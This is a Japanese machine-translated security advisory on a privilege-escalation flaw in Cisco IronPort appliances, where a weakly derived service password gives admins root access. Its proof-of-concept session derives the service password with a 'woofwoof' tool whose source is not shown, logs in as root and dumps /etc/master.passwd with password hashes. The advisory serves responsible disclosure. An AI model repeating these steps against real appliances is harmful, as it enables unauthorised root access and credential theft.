cisco ironport appliances service
1.0.0
Linuxのために更新されました
Cisco Ironportアプライアンス特権エスカレーション脆弱性ベンダー:Cisco製品Webページ:http://www.cisco.com影響バージョン:Cisco Ironport ESA -Asyncos 8.5.5-280 Cisco Ironport WSA -Asyncos 8.0.5-075 Cisco Iron Sma Sma -Asyncos 8.3.6-0日付:2014年5月22日クレジット:Glafkos Charalambous CVE:Ciscoによって割り当てられていません
開示タイムライン:19-05-2014:ベンダー通知20-05-2014:ベンダー対応/フィードバック27-08-2014:ベンダーフィックス/パッチ24-01-2015:公開開示
説明:Cisco Ironportアプライアンスは、認証された「管理者」特権のエスカレーションに対して脆弱です。 GUIまたはCLIからサービスアカウントを有効にすることにより、管理者はアプライアンスへのルートアクセスを取得できるため、既存のすべての「管理者」アカウントの制限をバイパスします。脆弱性は、パスワード生成プロセスでのアルゴリズムの実装が弱いためです。これは、Ciscoがアプライアンスにリモートにアクセスしてテクニカルサポートを提供するために使用されます。
ベンダーの対応:予想されているように、これは脆弱性とは見なされませんが、セキュリティ硬化の問題です。そのため、CVEを割り当てませんでしたが、これがSMA、ESA、WSAに固定されていることを確認しました。修正には、バイナリのアルゴリズムをより良く保護し、アルゴリズム自体がより堅牢になり、管理者がパスフレーズを設定してアカウントを有効にするときにパスワードの複雑さを強制するなど、いくつかの変更が含まれていました。
[SD]注:サポート代表者のアクセスをアクティブにし、最終的なパスワードの計算に使用されるパスフレーズを設定するには、管理資格が必要です。 [GC]まだ管理者ユーザーは、アプライアンスのアクセス許可が限られており、資格情報も妥協する可能性があります。
[SD]この問題は、Cisco Bug ID:CSCUO96011によるESAのCisco Bug ID:CSCUO96056およびCisco Bug ID CSCUO90528によるWSAの場合に追跡されます。
技術的な詳細:デフォルトのパスワード「Ironport」またはユーザーが指定したパスワードを使用してアプライアンスにログインすることにより、カスタマーサポートのリモートアクセスを有効にするオプションがあります。このオプションは、ヘルプとサポートの下にあります - > GUIでのリモートアクセスまたはCLIコンソールアカウント「enablediag」を使用してコマンドサービスを発行します。このサービスを有効にするには、アプライアンスのシリアル番号とともにCisco TechSupportにアプライアンスのシリアル番号とともに提供する必要がある一時的なユーザーパスワードが必要です。
サービスアカウントを有効にすることにより、一時的なパスワードとアプライアンスのシリアル番号を使用すると、攻撃者は完全なルートアクセスを取得し、潜在的にダメージを与えたり、バックドアを傷つけたりすることができます。
POC:
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
